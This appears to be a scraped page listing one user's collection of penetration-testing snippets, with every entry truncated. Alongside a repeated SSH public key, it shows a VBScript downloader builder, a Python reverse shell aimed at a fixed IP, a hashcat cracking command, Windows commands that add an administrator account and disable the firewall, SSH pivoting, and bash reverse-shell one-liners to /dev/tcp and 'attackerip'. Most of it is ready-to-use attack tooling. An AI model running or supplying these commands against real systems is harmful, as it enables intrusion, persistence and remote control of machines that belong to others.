View pub.txt
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
View pub.txt
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
View pub.txt
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
View wget_vbs
| echo strUrl = WScript.Arguments.Item(0) > wget.vbs | |
| echo StrFile = WScript.Arguments.Item(1) >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs | |
| echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs | |
| echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs | |
| echo Err.Clear >> wget.vbs | |
| echo Set http = Nothing >> wget.vbs | |
| echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs |
View simple_py_shell
| #!/usr/bin/python | |
| # imports here | |
| # Copyright 2012 TrustedSec, LLC. All rights reserved. | |
| # | |
| # This piece of software code is licensed under the FreeBSD license.. | |
| # | |
| # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. | |
| import socket,subprocess | |
| HOST = '192.168.12.45' # The remote host | |
| PORT = 443 # The same port as used by the server |
View password_cracking
| #cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist | |
| hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt |
View tricks
| #get a pty through python | |
| python -c 'import pty; pty.spawn("/bin/bash");' | |
| #grab the user agent from the http header on port 10443 | |
| tcpdump -A -l -vvvs 1024 -npi eth0 port 10443 | |
| #base64 decode a string | |
| echo STRINGTODECODE | base64 --decode | |
| #escape jail shell |
View windows_crap
| #add a user | |
| net user ryan mwcb /add | |
| #add user to local administrators | |
| net localgroup administrators /add ryan | |
| #remove firewall | |
| netsh firewall set opmode disable | |
| #enabled remote desktop |
View ssh_tricks
| ##SOCKS Proxy## | |
| #Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
| #Command line: | |
| ssh -D 127.0.0.1:1080 10.0.0.1 | |
| #~/.ssh/config: | |
| Host 10.0.0.1 | |
| DynamicForward 127.0.0.1:1080 | |
| #You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
View reverse_shells
| #bash | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| #bash alt | |
| exec /bin/bash 0&0 2>&0 | |
| #bash alt 2 | |
| 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
| #bash alt 3 |
NewerOlder